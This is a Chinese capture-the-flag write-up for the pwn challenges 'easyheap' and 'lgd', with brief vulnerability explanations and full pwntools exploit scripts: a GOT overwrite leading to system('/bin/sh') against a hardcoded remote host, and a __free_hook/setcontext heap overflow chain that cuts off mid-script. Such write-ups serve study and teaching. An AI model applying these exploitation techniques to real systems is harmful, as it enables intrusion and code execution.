
高校战“疫”网络安全分享赛pwn部分wp


easyheap

刚复现的第一题,并且在刚开始的时候连洞都找不到…可真是当头一棒。
漏洞在申请的大小大于0x400时直接return。这时ptr[i]没有被释放,接下来就是常规地劫持ptr[i]堆块上的指针为got表,再修改got表来实现利用。


```python
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
# Verbose tube logging, and amd64 so p64()/u64() pack 8-byte little-endian words.
context.update(log_level='debug', arch='amd64')
# Placeholder for the pwntools tube; pwn() rebinds it through `global p`.
p = 0
def pwn(ip,port,debug,flaag):
	"""Drive the easyheap menu binary through the write-up's interaction and hand over the tube.

	ip, port: remote endpoint, used when debug != 1.
	debug:    1 -> run `flaag` locally with process(); anything else -> remote(ip, port).
	flaag:    path to the target ELF; also parsed locally for its GOT/PLT entries.

	Side effects: rebinds the module-global `p` to the tube, prints two addresses,
	and ends in p.interactive(). Python 2 only (print statement, iterator .next()).
	"""
	elf = ELF(flaag)
	global p
	if(debug == 1):
		p = process(flaag)

	else:
		p = remote(ip,port)
	# Menu wrappers. Prompts are matched verbatim, so any change to the
	# binary's text breaks the whole interaction.
	def add(size,content):
		"""Menu option 1: request `size` bytes and send `content` for it."""
		p.sendlineafter("Your choice:\n","1")
		p.sendlineafter("this message?\n",str(size))
		p.sendafter("content of the message?\n",content)
	def free(index):
		"""Menu option 2: delete item `index`."""
		p.sendlineafter("Your choice:\n","2")
		p.sendlineafter("item to be deleted?\n",str(index))
	def edit(index,content):
		"""Menu option 3: overwrite item `index` with `content`."""
		p.sendlineafter("Your choice:\n","3")
		p.sendlineafter(" the item to be modified?\n",str(index))
		p.sendafter("content of the message?\n",content)
	# Hardcoded local libc; the puts/system offsets below are only valid if the
	# remote runs the same build (LibcSearcher is imported but not used here).
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	add(0x18,'\xff'*0x18)
	free(0)
	# Two raw size-0x500 requests (> 0x400): the add() wrapper is not used
	# because, per the write-up, the binary returns before asking for content.
	p.sendlineafter("Your choice:\n","1")
	p.sendlineafter("this message?\n",str(0x500))
	p.sendlineafter("Your choice:\n","1")
	p.sendlineafter("this message?\n",str(0x500))
	# 0x6020d8 / 0x6020f0 / 0x602100 / 0x602108 are absolute .bss addresses,
	# i.e. this assumes a non-PIE build; PIE alone would invalidate them.
	edit(0,p64(0)+p64(0x21)+p64(0x6020d8))
	edit(1,p64(0x6020f0)+p64(0x602100)+p64(0)+p64(elf.got['free'])+p64(0x200)+p64(0x602108)+'/bin/sh\x00')
	#gdb.attach(p)
	# Writes through item 0 retarget item 1 (the write-up says item 0 overlays
	# the pointer table): free@got <- puts@plt, then item 1 -> puts@got so the
	# next free(1) prints the resolved puts pointer. Full RELRO would make the
	# GOT read-only and stop these writes.
	edit(0,p64(0)+p64(0x21)+p64(elf.got['free']))
	edit(1,p64(elf.plt['puts']))
	edit(0,p64(0)+p64(0x21)+p64(elf.got['puts']))
	free(1)
	# A user-space amd64 pointer has 6 significant bytes; pad to 8 for u64().
	puts_addr=u64(p.recv(6).ljust(8,'\x00'))
	libcbase_addr=puts_addr-libc.symbols['puts']
	system_addr=libcbase_addr+libc.symbols['system']
	# NOTE(review): binsh_addr is computed but never used below.
	binsh_addr=libcbase_addr+libc.search("/bin/sh\x00").next()
	# Indices 3 and 4 follow from the layout written into item 1 above
	# (4th qword = free@got, 6th = 0x602108 holding "/bin/sh") -- presumably
	# free(4) then reaches system("/bin/sh"); confirm against the binary.
	edit(3,p64(system_addr))
	free(4)
	print "system_addr=>",hex(system_addr)
	print "libcbase_addr=>",hex(libcbase_addr)
	p.interactive()
if __name__ == '__main__':
	# Remote target from the write-up; debug=0 selects the remote() branch in pwn().
	target_host, target_port = '121.36.209.145', 9997
	pwn(target_host, target_port, 0, './easyheap')

```

lgd

开沙盒的堆溢出,老实说之前没遇到过这种。
在edit时read的长度是add时写在bss段的字符串长度,造成了堆溢出。利用堆溢出劫持__free_hook为setcontext,从而劫持rsp、rip,进而劫持程序,再利用ORW来泄露flag

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
# Verbose tube logging, and amd64 so p64()/u64() pack 8-byte little-endian words.
context.update(log_level='debug', arch='amd64')
# Placeholder for the pwntools tube; pwn() rebinds it through `global p`.
p = 0
def pwn(ip,port,debug,flaag):
	elf = ELF(flaag)
	global p
	if(debug == 1):
		p = process(flaag)

	else:
		p = remote(ip,port)
	def add(size,content):
		p.sendlineafter(">> ","1")
		p.sendlineafter("______?\n",str(size))
		p.sendafter("yes_or_no?\n",content)
	def free(index):
		p.sendlineafter(">> ","2")
		p.sendlineafter("index ?\n",str(index))
	def show(index):
		p.sendlineafter(">> ","3")
		p.sendlineafter("index ?\n",str(index))
	def edit(index,content):
		p.sendlineafter(">> ","4")
		p.sendlineafter("index ?\n",str(index))
		p.sendafter("c___new_content ?\n",content)
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	p.sendlineafter("what is your name? \n","aaa")
	add(0x50,"\xff"*0x200)
	add(0xf8,'\xff'*0x200)
	add(0x68,"\xff"*0x200)
	free(1)
	free(2)
	edit(0,"A"*0x58+"B"*8)
	show(0)
	p.recvuntil("BBBBBBBB")
	main_arena=u64(p.recv(6).ljust(8,"\x00"))
	libcbase_addr=main_arena-(0x7f9f177d8b78-0x7f9f17414000)
	free_hook=libcbase_addr+libc.symbols['__free_hook']
	edit(0,"A"*0x58+p64(0x101)+p64(main_arena)+p64(free_hook-0x40)+p64(0)*28+p64(0x100)+p64(0x71)+p64(free_hook-0x33))
	add(0xf8,'\xff'*0x200)
	add(0x68,'\xff'*0x200)
	add(0x68,'\xff'*0x200)
	edit(3,p64(0)*4+'\x00'*3+p64(libcbase_addr+libc.symbols['setcontext']+0x35))
	frame = SigreturnFrame()
	frame.rdi = 0
	frame.rax = 0
	frame.